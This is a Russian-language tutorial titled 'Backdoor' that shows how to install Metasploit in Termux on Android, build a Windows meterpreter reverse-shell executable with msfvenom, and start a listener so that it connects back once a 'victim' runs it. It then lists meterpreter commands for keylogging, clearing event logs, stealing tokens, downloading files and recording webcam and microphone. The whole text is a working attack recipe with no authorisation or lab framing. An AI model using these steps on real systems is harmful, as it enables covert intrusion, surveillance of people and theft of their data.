Бэкдор
Итак приступим:
- Скачиваем TERMUX с playmarket
- Открываем и вводим команду: #pkg upgrade
- Теперь клонируем metasploit: #git clone https://github.com/rapid7/metasploit-framework
- Переходим в директорию metasploit: #cd metasploit-framework
- Теперь создаём эксплоит
- #msfvenom -p windows/meterpreter/reverse_tcp lhost=IP атакующего lport=4444 -f exe R > /sdcard/mypayload.exe
- Файл сохраняется в корне хранилища.
- Запускаем metasploit #msfconsole
- #set payload windows/meterpreter/reverse_tcp
- #set LHOST 192.168.1.65 (IP атакующего)
- #set LPORT 4444
- #run
- Всё metasploit запущен, теперь необходимо запустить mypayload.exe на машине жертвы.
- Если появилась строка Meterpreter session 1 opened, то мы успешно подключены.
- Чтобы увидеть список возможностей # -h или ?
Основные команды:
Команды и их описание:
cat - Вывести содержимое файла на экран
cd - Сменить директорию
checksum - Получить контрольную сумму файла
cp - Скопировать файл/директорию в другое место
dir - Вывести список файлов (псевдоним для ls)
download - Загрузить файл или директорию
edit - Отредактировать файл
getlwd - Вывести локальную рабочую директорию
getwd - Вывести рабочую директорию
lcd - Изменить локальную рабочую директорию
lpwd - Вывести локальную рабочую директорию
ls - Показать список файлов
mkdir - Создать директорию
mv - Переместить файл/директорию в другое место
pwd - Вывести рабочую директорию
rm - Удалить указанный файл
rmdir - Удалить директорию
search - Поиск файлов
show_mount - Вывести всех точек монтирования/логических дисков
upload - Выгрузить файл или директорию
Сетевые команды:
Команды и их описание:
arp - Показать ARP кэш хоста
getproxy - Показать текущие настройки прокси
ifconfig - Показать интерфейсы
ipconfig - Показать интерфейсы
netstat - Показать сетевые соединения
portfwd - Перенаправить локальный порт на удалённую службу
resolve - Сделать запросы с цели на преобразование одного или нескольких имён хостов
route - Просмотр и изменение таблицы маршрутизации
Системные команды :
Команды и их описание:
clearev - Очистить журнал событий
drop_token - Отбрасывает любой активный токен имперсонализации.
execute - Выполнить команду
getenv - Получить значение одной или более переменных окружения
getpid - Получить идентификатор текущего процесса
getprivs - Попытаться включить все привилегии, доступные для текущего процесса
getsid - Получение SID пользователя
getuid - Получение имени пользователя
kill - Завершить процесс
localtime - Показать локальную дату и время целевой системы
pgrep - Фильтрация процессов по имени
pkill - Завершить процесс по имени
ps - Список запущенных процессов
reboot - Перезагрузить удалённый компьютер
reg - Изменение и взаимодействие с удалённым регистром
rev2self - Вызов RevertToSelf() на удалённой машине
shell - Перейти в системную командную оболочку
shutdown - Отключить удалённый компьютер
steal_token - Попытаться украсть impersonation token из целевого процесса
suspend - Приостанавливает или возобновляет список процессов
sysinfo - Получает информацию об удалённой системе, такую как вид ОС
Команды пользовательского интерфейса:
Команды и их описание:
enumdesktops - Список всех доступных рабочих столов и оконных станций
getdesktop - Получить текущий рабочий стол meterpreter
idletime - Возвращает количество секунд отсутствия активности удалённого пользователя
keyscan_dump - Дамп буфера нажатия клавиш
keyscan_start - Запустить захват нажатие клавиш
keyscan_stop - Остановить захват нажатия клавиш
screenshot - Получение скриншота интерактивного рабочего стола
setdesktop - Изменение текущего рабочего стола meterpreters
uictl - Контроль некоторых компонентов пользовательских интерфейсов
Команды для управления вэб-камерой:
Команды и их описание:
record_mic - Запись аудио со стандартного микрофона в течение X секунд
webcam_chat - Начать видеочат
webcam_list - Вывести список веб-камер
webcam_snap - Сделать снимок указанной веб-камерой
webcam_stream - Запустить видеопоток с выбранной веб-камеры